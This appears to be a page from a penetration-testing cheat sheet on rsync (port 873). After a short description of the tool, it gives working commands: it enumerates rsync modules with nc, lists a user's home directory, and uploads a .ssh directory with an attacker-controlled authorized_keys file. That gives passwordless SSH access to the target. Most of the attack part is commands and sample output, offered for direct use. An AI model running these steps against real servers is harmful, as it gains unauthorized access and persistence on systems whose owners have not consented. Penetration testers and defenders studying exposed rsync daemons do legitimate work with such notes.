rsync (Port 873)
What is rsync?
Rsync is a fast and extraordinarily versatile file copying tool. It can copy locally, to/from another host over any remote shell, or to/from a remote rsync daemon. It offers a large number of options that control every aspect of its behavior and permit very flexible specification of the set of files to be copied. It is famous for its delta-transfer algorithm, which reduces the amount of data sent over the network by sending only the differences between the source files and the existing files in the destination. Rsync is widely used for backups and mirroring and as an improved copy command for everyday use.
nc
Enumerate directory names (when anonymous access enabled):
$ nc <remote_ip> 873
@RSYNCD: 31.0 <--- You receive this banner with the version from the server
@RSYNCD: 31.0 <--- Then you send the same info
#list <--- Then you ask the sever to list
this_is_a_username <--- The server starts enumerating
@RSYNCD: EXIT <--- Sever closes the connection
rsync
Enumerate directory content:
$ rsync -av --list-only rsync://<remote_ip>/<user's_home_directory>
receiving incremental file list
drwxr-xr-x 4,096 2021/01/21 09:21:59 .
lrwxrwxrwx 9 2020/12/03 15:22:42 .bash_history -> /dev/null
-rw-r--r-- 220 2019/04/18 00:12:36 .bash_logout
-rw-r--r-- 3,526 2019/04/18 00:12:36 .bashrc
-rw-r--r-- 807 2019/04/18 00:12:36 .profile
sent 20 bytes received 136 bytes 24.00 bytes/sec
total size is 4,562 speedup is 29.24
Upload authorized_keys
If we have access to a user's home directory via rsync, we can upload authorized_keys
that contains our public key, so that SSH won't ask us for password.
Generate RSA key pairs:
$ mkdir .ssh
$ cd .ssh
$ ssh-keygen
Prepare authorized_keys
and upload the entire .ssh
directory to the remote machine:
$ cd .ssh
$ cat id_rsa.pub > authorized_keys
$ cd ..
$ rsync -a --relative ./.ssh rsync://<remote_ip>/<user's_home_directory>/
SSH in:
$ chmod 600 .ssh/id_rsa
$ ssh -i .ssh/id_rsa <username>@<remote_ip>
Reference
Last updated
Was this helpful?